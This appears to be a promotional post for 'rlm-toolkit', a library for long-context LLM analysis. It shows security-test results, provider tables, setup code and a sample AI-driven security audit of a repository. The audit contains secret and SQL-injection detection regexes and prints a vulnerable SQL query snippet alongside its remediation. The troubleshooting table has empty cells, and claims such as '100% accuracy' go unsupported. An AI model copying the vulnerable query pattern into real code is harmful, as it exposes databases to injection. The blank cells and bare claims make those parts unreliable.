tests/security/test_sandbox.py::test_exec_blocked PASSED
tests/security/test_exfiltration.py::test_network_blocked PASSED
tests/security/test_exfiltration.py::test_file_read_blocked PASSED
tests/security/test_obfuscation.py::test_base64_decode_blocked PASSED
tests/security/test_obfuscation.py::test_hex_decode_blocked PASSED
tests/security/test_obfuscation.py::test_rot13_blocked PASSED
tests/security/test_indirect.py::test_context_injection_blocked PASSED
tests/security/test_indirect.py::test_prompt_injection_detected PASSED
tests/security/test_builtins.py::test_globals_access_blocked PASSED
tests/security/test_builtins.py::test_builtins_access_blocked PASSED
tests/security/test_builtins.py::test_subclasses_blocked PASSED
tests/security/test_vfs.py::test_quota_enforcement PASSED
tests/security/test_vfs.py::test_path_traversal_blocked PASSED
tests/security/test_redaction.py::test_api_key_redacted PASSED
tests/security/test_redaction.py::test_password_redacted PASSED
tests/security/test_redaction.py::test_ssn_redacted PASSED
tests/security/test_circle.py::test_circle_benchmark_passed PASSED
tests/security/test_circle.py::test_all_attack_categories_blocked PASSED
================================ 27 passed in 12.34s ================================
| Category | Providers |
|---|---|
| Cloud API | OpenAI, Anthropic, Google, Mistral, Cohere, AI21 |
| Inference API | Together, Fireworks, Groq, Hyperbolic, Anyscale |
| Local | Ollama, vLLM, llama.cpp, LM Studio, LocalAI |
| Enterprise | Azure OpenAI, AWS Bedrock, GCP Vertex AI |

| Provider | Model | Context | Code Gen | Speed | Cost/1M tok |
|---|---|---|---|---|---|
| OpenAI | GPT-4o | 128K | ⭐⭐⭐⭐ | Fast | $5 |
| OpenAI | GPT-OSS-120B | 128K | ⭐⭐⭐⭐ | Fast | $3 |
| Anthropic | Claude Opus 4.5 | 200K | ⭐⭐⭐⭐⭐ | Medium | $15 |
| Anthropic | Claude Sonnet 4.5 | 200K | ⭐⭐⭐⭐⭐ | Fast | $3 |
| Google | Gemini 3 Pro | 2M | ⭐⭐⭐⭐ | Fast | $1.25 |
| Google | Gemini 3 Flash | 1M | ⭐⭐⭐⭐ | Very Fast | $0.08 |
| Meta | Llama 4 Scout | 10M | ⭐⭐⭐⭐ | Varies | Free |
| Alibaba | Qwen3-235B | 128K | ⭐⭐⭐⭐ | Fast | $0.50 |
| Mistral | Large 3 | 128K | ⭐⭐⭐⭐ | Fast | $2 |
Budget-First:
from rlm_toolkit import RLM, RLMConfig
# Use factory methods for easy setup
rlm = RLM.from_ollama("llama4-scout")  # 100% free local
# Cost: $0 per 10M token analysis
Quality-First:
# Claude for best code generation
rlm = RLM.from_anthropic(
    root_model="claude-opus-4.5",
    sub_model="claude-haiku",
)
# Cost: ~$8 per 10M token analysis
Privacy-First (100% Local):
rlm = RLM(
    root=OllamaProvider("llama4-scout:109b"),  # 10M native context!
    sub=OllamaProvider("qwen3:7b"),            # Fast inference
)
# Cost: $0 + electricity (~$0.50)
⚡ Speed-First:
# OpenAI is fastest cloud option
rlm = RLM.from_openai(
    root_model="gpt-4o",
    sub_model="gpt-4o-mini",
)
# Speed: ~2 min for 10M tokens
import os
import time
from rlm_toolkit import RLM, RLMConfig, SecurityConfig
from rlm_toolkit.memory import HierarchicalMemory
from rlm_toolkit.observability import ConsoleTracer
# Configuration
config = RLMConfig(
    max_iterations=50,
    max_cost=5.0,
    use_infiniretri=True,
    infiniretri_threshold=100_000,
    security=SecurityConfig(sandbox=True),
)
# Memory and tracing
memory = HierarchicalMemory()
tracer = ConsoleTracer(verbose=True)
# Initialize RLM
rlm = RLM.from_ollama(
    model="llama4-scout:109b",
    config=config,
    memory=memory,
    tracer=tracer,
)
# Load repository
def load_repo(path: str) -> str:
    content = []
    for root, dirs, files in os.walk(path):
        # Skip hidden and common excludes
        dirs[:] = [d for d in dirs if not d.startswith('.') and d not in ['node_modules', '__pycache__', 'venv']]
        for f in files:
            if f.endswith(('.py', '.js', '.ts', '.go', '.rs')):
                filepath = os.path.join(root, f)
                try:
                    with open(filepath, encoding='utf-8') as fp:
                        content.append(f"\n\n# === FILE: {filepath} ===\n{fp.read()}")
                except (OSError, UnicodeDecodeError):
                    # Skip unreadable or non-UTF-8 files
                    continue
    return "".join(content)
codebase = load_repo("./my_project")
print(f"Loaded {len(codebase):,} characters ({len(codebase)//4:,} tokens)")
# Run analysis
start = time.time()
result = rlm.run(
    context=codebase,
    query="""
    Perform a full security audit of the codebase:
    1. SQL/NoSQL injection
    2. XSS vulnerabilities
    3. SSRF
    4. Hardcoded secrets
    5. Insecure deserialization
    6. Path traversal
    7. Authentication/authorization issues
    8. Race conditions
    For each vulnerability found, provide:
    - File and line
    - Vulnerability type
    - Severity (Critical/High/Medium/Low)
    - Remediation recommendation
    """,
)
elapsed = time.time() - start
print("\n" + "="*60)
print("RESULT:")
print("="*60)
print(result.answer)
print(f"\nTime: {elapsed:.1f}s")
print(f"Iterations: {result.iterations}")
print(f"Sub-calls: {result.subcalls}")
print(f"Cost: ${result.cost:.2f}")
[RLM] Starting analysis...
[RLM] Context size: 2,847,293 chars (711,823 tokens)
[RLM] Using InfiniRetri (threshold exceeded)
[Iter 1] Root LLM generating code...
>>> files = context.split("# === FILE:")
>>> print(f"Repository contains {len(files)} files")
Output: Repository contains 127 files
[Iter 2] Root LLM generating code...
>>> security_patterns = {
...     "sql_injection": [r"execute\(.*%s", r"\.format\(.*\)", r"f\".*SELECT"],
...     "xss": [r"innerHTML\s*=", r"\.html\(.*\+"],
...     "secrets": [r"password\s*=\s*[\"']", r"api_key\s*=", r"secret\s*="],
... }
>>> import re
>>> findings = []
>>> for i, file in enumerate(files[1:], 1):
...     for vuln_type, patterns in security_patterns.items():
...         for pattern in patterns:
...             if re.search(pattern, file):
...                 findings.append((i, vuln_type, pattern))
>>> print(f"Found {len(findings)} potential issues")
Output: Found 23 potential issues
[Iter 3] Sub-LLM call for deep analysis...
>>> for file_idx, vuln_type, _ in findings[:5]:
...     file_content = files[file_idx][:6000]
...     analysis = llm_query(f"Analyze for {vuln_type}:\n{file_content}")
...     print(f"File {file_idx}: {analysis[:200]}")
[SUB-CALL 1/5] Analyzing file 3...
[SUB-CALL 2/5] Analyzing file 7...
[SUB-CALL 3/5] Analyzing file 12...
[SUB-CALL 4/5] Analyzing file 19...
[SUB-CALL 5/5] Analyzing file 24...
...
[Iter 8] Compiling final report...
>>> vulnerabilities = [
...     {"file": "api/users.py", "line": 42, "type": "SQL Injection",
...      "severity": "Critical", "code": "cursor.execute(f'SELECT * FROM users WHERE id={user_id}')"},
...     {"file": "utils/auth.py", "line": 87, "type": "Hardcoded Secret",
...      "severity": "High", "code": "API_KEY = 'sk-abc123...'"},
...     ...
... ]
>>> FINAL_VAR(vulnerabilities)
============================================================
RESULT:
============================================================
[
  {
    "file": "api/users.py",
    "line": 42,
    "type": "SQL Injection",
    "severity": "Critical",
    "description": "User input directly interpolated into SQL query",
    "recommendation": "Use parameterized queries: cursor.execute('SELECT * FROM users WHERE id=%s', (user_id,))"
  },
  {
    "file": "utils/auth.py",
    "line": 87,
    "type": "Hardcoded Secret",
    "severity": "High",
    "description": "API key hardcoded in source code",
    "recommendation": "Move to environment variable: os.environ.get('API_KEY')"
  },
  ...
]
Time: 127.3s
Iterations: 8
Sub-calls: 12
Cost: $0.00 (local model)
| Problem | Cause | Solution |
|---|---|---|
| | The LLM cannot find the answer | Increase |
| | Too many sub-calls | Limit |
| | Code runs for too long | Increase |
| | Import blocked by security | Add to the whitelist if safe |
| | OOM on a small model | Use a smaller |
from rlm_toolkit import RLM
from rlm_toolkit.observability import ConsoleTracer, FileTracer
# Console tracing (development)
rlm = RLM.from_ollama("llama4-scout:17b", tracer=ConsoleTracer(verbose=True))
# File tracing (production)
rlm = RLM.from_ollama("llama4-scout:17b", tracer=FileTracer("./logs/rlm.log"))
# View execution history
result = rlm.run(context, query)
for step in result.trace:
    print(f"[{step.type}] {step.content[:100]}...")
# 1. Use smaller model for sub-calls
rlm = RLM(
    root=OllamaProvider("llama4-scout:109b"),  # Smart for planning
    sub=OllamaProvider("qwen3:7b"),            # Fast for details
)
# 2. Enable caching
from rlm_toolkit.cache import DiskCache
rlm = RLM.from_ollama("llama4-scout:17b", cache=DiskCache("./cache"))
# 3. Parallel sub-calls (experimental)
config = RLMConfig(parallel_subcalls=True, max_parallel=4)
| Component | Description | Source |
|---|---|---|
| RLM Core | Recursive Language Models | arxiv:2512.24601 |
| InfiniRetri | Attention-based infinite retrieval | arxiv:2502.12962 |
| H-MEM | Hierarchical memory | arxiv:2507.XXXXX |
| R-Zero | Self-evolving LLMs | arxiv:2508.05004 |
| REBASE | Experience replay | arxiv:2512.29379 |
| CIRCLE | Security benchmark | arxiv:2507.19399 |
10M+ tokens without quality degradation
100% accuracy on Needle-in-a-Haystack
4-level memory instead of a simple buffer
38 dangerous modules blocked: production-ready security
75+ providers, including 100% local options
GitHub: github.com/DmitrL-dev/AISecurity/tree/main/rlm-toolkit
Documentation: docs
pip install rlm-toolkit
# With the full set of integrations
pip install rlm-toolkit[all]
Questions? Leave a comment or open an issue on GitHub!
About the author: developer of the SENTINEL AI Security Platform, an open-source solution for protecting LLM applications.